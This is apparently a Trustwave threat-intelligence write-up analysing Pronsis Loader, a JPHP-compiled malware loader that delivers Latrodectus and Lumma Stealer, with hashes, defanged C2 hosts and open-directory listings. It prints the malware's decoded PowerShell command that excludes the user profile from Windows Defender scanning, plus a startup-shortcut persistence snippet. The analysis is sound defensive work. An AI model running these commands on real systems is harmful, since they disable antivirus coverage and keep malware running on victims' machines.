Trustwave's 2024 Retail Report Series Highlights Alarming E-Commerce Threats and Growing Fraud Against Retailers. Learn More

Trustwave's 2024 Retail Report Series Highlights Alarming E-Commerce Threats and Growing Fraud Against Retailers. Learn More

Services
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

Pronsis Loader: A JPHP-Driven Malware Diverging from D3F@ck Loader

Trustwave's Threat Intelligence team has discovered a new malware dubbed Pronsis Loader, with its earliest known variant dating back to November 2023.

This loader shares similarities with the D3F@ck Loader , which surfaced in January 2024. Pronsis Loader has been observed delivering different malware variants, including Lumma Stealer and Latrodectus as its primary payloads. Additionally, the team identified infrastructure linked to Lumma Stealer during the investigation.

 

Pronsis Loader

Pronsis Loader is a newly identified malware that bears similarities to the D3F@ck Loader. Both utilize JPHP-compiled executables, making them easily interchangeable. However, one area they diverge in is their installer approaches: while D3F@ck Loader uses Inno Setup Installer, Pronsis Loader leverages Nullsoft Scriptable Install System (NSIS) . NSIS, an open-source tool, enables the creation of customized Windows installers, which Pronsis Loader uses for its deployment.

Figure 1. The use of NSIS by Pronsis Loader
Figure 1. The use of NSIS by Pronsis Loader

What makes this type of loader particularly interesting is its use of JPHP, a less common programming language among threat actors. JPHP, a Java implementation of PHP, was notably used by IceRat in 2020 then by D3F@ck in 2024. Unlike typical Java files that use the .class extension, JPHP files are compiled into .phb format. While these .phb files cannot be directly decompiled with conventional Java tools, they still contain 0xCAFEBABE headers, which signify a Java class. This allows for decompilation after extraction.

A key difference with Pronsis Loader is its overall lack of certificate usage, including SSL certificates, in its installer files. While many malware families rely on certificates to enhance trust or encrypt communications, often bypassing security measures, Pronsis Loader generally avoids this approach. This omission could make it easier to detect in environments that check for certificate-based security.

Figure 2. CAFEBABE headers within the .phb files
Figure 2. CAFEBABE headers within the .phb files

The Pronsis Loader discovered was named FullWorker-Install_sib.xyz (SHA256: fee966680f41a4e28497ebf9d6e10486b427efff21f88163462a6c19b7d2bdc0). Using 7-Zip, we extracted the contents of the NSIS installer. Interestingly, while the latest versions of 7-Zip cannot extract NSIS scripts, version 15.05 and earlier versions allow for successful extraction of these scripts.

Figure 3. NSIS Script File extracted in earlier versions of 7-zip
Figure 3. NSIS Script File extracted in earlier versions of 7-zip

Upon analysis, most of the NSI script focuses on dropping files into the %Temp% directory. Despite the installer’s considerable size (~90MB), most of the installer’s contents consist of benign files designed to disguise malicious files. As seen in Figure 5, all these are known files aside from the FailWorker-Install.exe (SHA256: 7e3ccfeb074c4666a4a34ae23c0606432f77c641e1cf62fc034a6575dd23abd1), which contains the malicious code.

Figure 4. Dropping of files in the TEMP directory
Figure 4. Dropping of files in the %TEMP% directory

Figure 5. FailWorker-Install.exe disguising itself within legitimate files
Figure 5. FailWorker-Install.exe disguising itself within legitimate files

At the latter end of the script, an NSIS plug-in was used for executing the Pronsis Loader. This calls Nact.dll with the exportinstall, which will run the JPHP-compiled executable loader FailWorker-Install.exe.

Figure 6. NSIS plug-in to run Pronsis Loader
Figure 6. NSIS plug-in to run Pronsis Loader

In Pronsis Loader, the executable is implemented in Java and can be easily extracted using 7-Zip, making it relatively straightforward to analyze. In contrast, some versions of D3F@ck Loader uses a password-protected file, with the password embedded in its InnoSetup installer script.

In certain instances of Pronsis Loader, a visible user interface is presented during the "installation" process. However, in most recent versions, a silent installation method is employed, where no user interface is displayed.

Figure 7. Installation that leads to Pronsis Loader
Figure 7. Installation that leads to Pronsis Loader

Once extracted, the initial module to be loaded can be identified within the JPHP-INF directory. In Figure 8, the launcher.conf file specifies a .bootstrap file, which indicates that the app\modules directory will be loaded.

Figure 8. Identifying which module is the entry point
Figure 8. Identifying which module is the entry point

The AppModule directory contains two .phb files that still cannot be directly decompiled. However, extracting the files with the 0xCAFEBABE headers allows it to be successfully decompiled. In this case, we have also included other .phb files in the app directory and not only in the app\modules\ directory.

Figure 9. Directory of the main module
Figure 9. Directory of the main module

Figure 10. CAFEBABE headers within the main modules
Figure 10. CAFEBABE headers within the main modules

Upon extracting the .class file from MainModule.phb, it becomes clear that the loader is designed to download a payload from a specified URL. This URL is later observed delivering the Latrodectus malware.

Figure 11. Code snippet where the payload is downloaded from
Figure 11. Code snippet where the payload is downloaded from

The source path of the threat actor for Pronsis Loader for this file is:

E:\\Lab\\ORDERS\\090424-3\\src\\app\\modules\\MainModule.php

Our observations reveal consistent patterns in both the source path and ZIP file naming conventions used by Pronsis Loader. The loader consistently utilizes the source path E:\Lab\ORDERS\<Date>, and the ZIP files generally follow a naming pattern of three concatenated words ([word1][word2][word3].zip). Notably, in most ZIP files, the third word is PRO. This information was extracted from the Pronsis Loader files, as detailed below:

Source Path

Download ZIP File

File Date

E:\\Lab\\ORDERS\\1103-1\\01new\\src\\app\\modules\\MainModule.php

respondintegratepro.zip

November 2023

E:\\Lab\\ORDERS\\0329-5\\03\\src\\app\\modules\\MainModule.php

messagescientistpro.zip

March 2024

E:\\Lab\\ORDERS\\061724-1\\src\\app\\modules\\MainModule.php

userapidpro.zip

June 2024

E:\\Lab\\ORDERS\\072924-1\\src\\app\\forms\\MainForm.php

speechcarrierpro.zip

July 2024

 

The payload is contained in a file named todaydatabase.zip (SHA256: 32f3bf999bda8cb72484c2fa659be105cf6cfd56487e2d825843a96b7a32ada0), which is downloaded and saved in the path %Temp%/todaydatabase.zip . After the download, the todaydatabase.zip file is extracted and executed, initiating the infection process for Latrodectus malware.

In addition to the payload delivery, a module for defense evasion is embedded within the MainForm.phb file. The string within this module is encoded in base64, and when decoded, it reveals a PowerShell script. This script is used to exclude the user's profile directory (C:\Users\<username>) from being scanned by Windows Defender, enabling the malware to evade detection.

Figure 12. Base64-encoded string used to evade Windows Defender scanning
Figure 12. Base64-encoded string used to evade Windows Defender scanning

The decoded command is as follows:

@ECHO OFF
powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE

 

This PowerShell command will be placed in a batch file (.bat) with a randomized numeric filename and saved in the %Temp% directory. This batch file is then executed via cmd.exe.

Figure 13. Creation and execution of the batch file
Figure 13. Creation and execution of the batch file

 

Latrodectus Payload

Latrodectus, discovered in October 2023, shares similarities with IcedID in terms of behavior and structure. It has primarily been distributed via phishing emails and has garnered attention in recent months due to its increasing activities.

Within the downloaded archive file, the payload todaydatabase.exe (SHA256: b45bc251e0c731d157638bf162aad13b4428387ada433b37dba3796cbd9b4093) is executed, which subsequently drops another executable, todaydatabaseovlresig.exe (SHA256: d8ff7b3040d2674dbdc77b184266ddef54444c0d8db4880ddd3bcd45d610e0c1). This secondary executable then drops and executes the various components of the Latrodectus malware, leading to its full infection on the system.

Figure 14. Process tree of the initial Latrodectus malware
Figure 14. Process tree of the initial Latrodectus malware

The file todaydatabaseovlresig.exe was converted using Bat2Exe and, upon execution, drops a 7zip archive. This archive contains two files:

  1. autorun.bat (SHA256: 60e863e70dce64bbd564b98113a75f58c455ae604235ed1339a595944a19321a)
  2. todaydatabaseovlresig.exe (SHA256: 989f811ac3c4ba5413fef99154ba60d930835d17832d6c26e3b66d9d45e01126) – similar file name but different hash

The batch file (autorun.bat) is executed from a temporary directory, facilitating further actions related to the deployment of Latrodectus.

Figure 15. Contents of the 7-zip file
Figure 15. Contents of the 7-zip file

The contents of autorun.bat are detailed in Figure 16. The script begins with the command @echo off, which disables the display of commands being executed. It then uses xcopy to copy todaydatabaseovlresig.exe from its current location to the %TEMP% directory.

Figure 16. Contents of autorun.bat
Figure 16. Contents of autorun.bat

After setting up some variables, the script runs a PowerShell command to create a Windows Shortcut File for the copied file in the %TEMP% directory. This ensures that the file automatically executes when the user logs in. The PowerShell script used is as follows:

powershell -Command
"$WScriptShell = New-Object -ComObject WScript.Shell;
$Shortcut = $WScriptShell.CreateShortcut('%startupFolder%\%shortcutName%');
$Shortcut.TargetPath = '%filePath%';
$Shortcut.Save()"

Since the malware has not yet been executed from the %Appdata% directory, it will drop a copy of itself into the %Appdata%\Custom_update directory with a filename that includes randomized hexadecimal characters. In this case, the final path and name is:

C:\Users\<user>\AppData\Roaming\Custom_update\Update_824f1995.exe

This file in the AppData directory will be the final executable used to carry out the malware’s functions.

Figure 17. Process tree leading to the final payload
Figure 17. Process tree leading to the final payload

To achieve persistence, the malware creates a scheduled task named Updater that runs every 10 minutes, executing the file located in the Custom_update directory.

Figure 18. Scheduled task of Latrodectus
Figure 18. Scheduled task of Latrodectus

Additionally, the malware establishes a mutex named runnung , consistent with previous versions of the malware.

Figure 19. Created mutex for Latrodectus
Figure 19. Created mutex for Latrodectus

The observed command-and-control (C2) servers for this Latrodectus variant are:

  • hxxps://restoreviner[.]com/test/
  • hxxps://peronikilinfer[.]com/test/

 

Lumma Stealer Payload

The team has also observed that Pronsis Loader deploys Lumma Stealer, which operates under a Malware-as-a-Service (MaaS) model and has been active in the wild since 2022. Unlike Latrodectus , which is another payload associated with Pronsis Loader, Lumma Stealer has been the predominant payload in most instances of Pronsis Loader files.

The initial file of the Lumma stealer observed is detailed_agreement_and_payment_information_august_2024_documentation.exe (SHA256: a94c04f560d7381a445aaef3cc977fbf179e021568674e09170a7a4bcf381d10), which is a Nullsoft installer. Upon installation, it drops a JPHP-compiled file named EducationGraduate_Setup.exe (SHA256: 77ccd2215c29f6c4ee2c997d93edbd598a3346df352d75abe0a51a8f002f0ea2) in the %Temp%/EducationGraduate_Setup path.

Figure 20. Dropped files of the installer file
Figure 20. Dropped files of the installer file

It will be downloading the payload from the following URL:

  • hxxp://91[.]208[.]206[.]5/nego/individualcoordinatepro.zip

This ZIP file contains the executable individualcoordinate.exe (SHA256: 5448b5b736ed090c7216e01bf24088607b0ee5f34c2508f0e1a9112e473b87f7), which is a .NET application. The executable includes functionality for decoding an encrypted DLL file, which is retrieved from:

  • hxxp://91[.]208[.]206[.]5/nego/Zazkanqh[.]wav

Figure 21. Decryption routine for the DLL file
Figure 21. Decryption routine for the DLL file

The encrypted DLL file Zazkanqh.wav (SHA256: f244b2c81fbb82c7086a1b9eb0d22c3435cc7d0d6e34759fcc6b6089746ec1fd) can be decoded either using the routine embedded in individualcoordinate.exe or manually with XOR decryption tools.

Figure 22. Manual decryption using Cyberchef
Figure 22. Manual decryption using Cyberchef

The observed C2 server for this Lumma Stealer variant is:

  • hxxps://locatedblsoqp[.]shop/api

 

Lumma Stealer Repository

Based on the IP address from which Pronsis Loader downloaded the Lumma Stealer file, the team was able to identify additional infrastructure that the loader may be utilizing both currently and in the future.

The IP address 91[.]208[.]206[.]5 is hosted by Alexhost SRL. From this information, the team was able to identify additional IP addresses with open directories accessed by the loader for downloading Lumma Stealer.

Identified IP addresses:

  • 176[.]123[.]1[.]34
  • 193[.]233[.]203[.]109
  • 193[.]233[.]203[.]31
  • 91[.]208[.]197[.]152
  • 213[.]232[.]235[.]202
  • 91[.]208[.]206[.]5
  • 37[.]221[.]65[.]251
  • 37[.]221[.]67[.]211
  • 193[.]233[.]202[.]183
  • 85[.]239[.]34[.]61
  • 91[.]229[.]239[.]57
  • 159[.]253[.]120[.]202
  • 94[.]103[.]188[.]64
  • 85[.]239[.]33[.]22
  • 93[.]185[.]167[.]95
  • 176[.]123[.]2[.]192
  • 185[.]113[.]8[.]141
  • 45[.]86[.]86[.]15

From these IP addresses, we identified additional open directories that are used to store malicious files, particularly Lumma Stealer files. Here are some of the identified open directories:

Open Directory

Content

hxxp://193[.]233[.]203[.]37/look/

Lisacbhs.pdf

 

Pic1.jpg

 

Pic2.jpg

 

Vkqqolfaw.pdf

 

middledetailedpro.zip

 

nightconsiderablepro.zip

hxxp://193[.]233[.]203[.]37/cook/

Document.pdf.url

 

Eduxkwamadk.pdf

 

Imyiewu.vdf

 

Movpyeijzyn.mp3

 

Nyujne.dat

 

Xaiyd.vdf

 

eitherareapro.zip

 

manassociatepro.zip

 

new.html

 

putty.exe

hxxp://193[.]233[.]203[.]37/moon/

Ckinnxvfff.vdf

 

Dmhxiccu.vdf

 

LummaC2.exe

 

PHOENIX_NATION_BUILD_YOUR_FOUNDATION_6_WEEK_PROGRAM.pdf

 

concernprospectpro.zip

 

formprogrammerpro.zip

hxxp://193[.]233[.]203[.]37/wood/

Gefzummbqfg.mp4

 

Oyrqngkj.mp4

 

Xbbem.pdf

 

americanperformpro.zip

hxxp://91[.]208[.]206[.]5/env

Npiumcdlbc.mp3

 

Qeoqmrzbhj.mp3

 

alsodiscussionpro.zip

 

yearprogrampro.zip

hxxp://91[.]208[.]206[.]5/mime

DifferentVendor.zip

 

amongcommunication.zip

hxxp://91[.]208[.]206[.]5/mpm

Ipqgeb.mp3

 

whereeyestrainpro.zip

hxxp://91.208.206.5/authz/

fathertaskpro.zip

hxxp://91.208.206.5/nego/

Zazkanqh.wav

 

individualcoordinatepro.zip

hxxp://193[.]233[.]203[.]31/mine/

Nkpko.vdf

 

Uptnoriap.vdf

 

Yzscv.mp3

 

forest.jpeg

 

pressureprocesspro.zip

hxxp://37[.]221[.]65[.]251/nano/

Jodlqytbdy.pdf

 

longworkplacepro.zip

hxxp://37[.]221[.]65[.]251/mobi/

7d.jpg

 

millionarisepro.zip

 

putty.zip

hxxp://37[.]221[.]67[.]211/direct/

Mfrngcojt.mp4

 

Sjehrpev.pdf

 

Ztyavdk.wav

 

easyenterprisepro.zip

 

speechcarrierpro.zip

 

svchost.exe

hxxp://37[.]221[.]67[.]211/before/

-

hxxp://213[.]232[.]235[.]202/garant/

7d.jpg

 

talkprevailingpro.zip

 

Aside from these IP addresses and open directories, the team has discovered similarities among the latest Pronsis Loader files. The internal name used for these files, particularly in the latest campaign, is newfileov01prosign. Moreover, another name identified in the files is IedZ95gZDV, which was used before this latest campaign. From this, additional loader files were also identified

  • 8bdec308590bca50e04d23abb9e44c2665f6d5cdb00f2ad8b8535a24aeab9df2
  • 20be60f5995a1041bfc9fb1aadf27c469a31b34277979c25f18bcbea8f4ed74b
  • f18fa5aad5877f994ffb403f3a34367b7d296803e4a892f8035df5129b72273a
  • b3929ac3936237590d3b3210a120703b9dfda91cc30d0ab7088738fc76626728
  • 897e9663f37e54915a60b54e160478a60520f43a497ec9fb5913d21ae456ae37
  • ffe15cb0e5919a5b37825f2c24cb57f063b9c24d04b86888dfc129f7905e45ee
  • c2439b3778afe4aa4aea45a7e4d62811201f3a51a6820bcad6f195f58ef5324b
  • 98f880e1ca7f4f5a869e7c1641206fe8ffe91fb171fb3256ff91bea5d322a1d3
  • 84a8d78d1c276560a0e7596206029809c11046b4d14e8df1d13044b78362b567
  • f76e0d89d63d173ccdbefd484d9d5c21420c8a5630084b29bfa0f0fdbee6ec04
  • 0c7fa9cdb7bd20cf3acf1677f35bbc1217203ae2031cf20ee71ba85680f06a87
  • 192e05f11f9ad5575766732105668a7a81aff690af079f610c73a8cfd928a88e
  • 908551fca6bc1e5370afa6012e580e5e9f2b9251028a6e213835eed4b044fc4d
  • 528d7edc3231250dfa8db1ddf8286ea7ba978059f82700f81f996e628932051d

All these are JPHP-compiled files. Most of the payload of these files are Lumma Stealer. This leads to new IP addresses with open directories based on their connections:

  • 85[.]239[.]33[.]148
  • 193[.]233[.]203[.]37

The discovery of Pronsis Loader highlights its similarities with D3F@ck Loader and its role in delivering Lumma Stealer and Latrodectus as primary payloads. The identification of related infrastructure enhances understanding of this threat. Looking ahead, this underscores the importance of maintaining vigilance and adaptability in threat intelligence practices. Leveraging these insights will be crucial for anticipating and countering future malware developments, ensuring that defenses remain effective against evolving threats.

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo